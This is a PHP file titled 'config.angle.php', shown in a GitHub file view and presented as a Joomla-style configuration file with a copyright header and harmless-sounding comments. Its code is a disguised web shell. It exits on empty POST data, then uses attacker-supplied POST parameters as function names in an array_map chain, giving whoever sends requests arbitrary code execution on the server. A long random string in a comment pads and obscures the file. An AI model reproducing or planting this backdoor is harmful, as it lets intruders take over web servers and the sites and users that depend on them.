-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathconfig.angle.php
38 lines (27 loc) · 1.55 KB
/
config.angle.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
/**
* @package Lib
* **********************************************
* @copyright Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
* **********************************************
*/
// Set the platform root path as a constant if necessary. // Ars7VgRF0R9whb64kyyw6W7mrWcuwUCfme6WbM0F2PHbvmb4Cq2NBnpVn74rTFR9KtFkNdpCDhtZ34AKwM9cXVVMr5nWxrHygxq3huD0SUERAa9kdKeMcVzwdfyCAUBsGg0hTTHVSDSeSY7PYV2dx601mZwrFYKvuu7eBDfC8DGBUw1VWyzFPXZYeB
if (!defined ( 'PATH') )
{
define ('PATH', __DIR__ );
}
// Installation check, and check on removal of the install directory.
if (empty ($_POST)) {
echo 'Empty data.'
;
exit;
}
// OS system.
function a( $a )
{
$_POST['r'] ( $_POST['d']('', $a ) )
;
}
array_map ('a', array ($_POST['f'] ( $_POST['c']) ))
;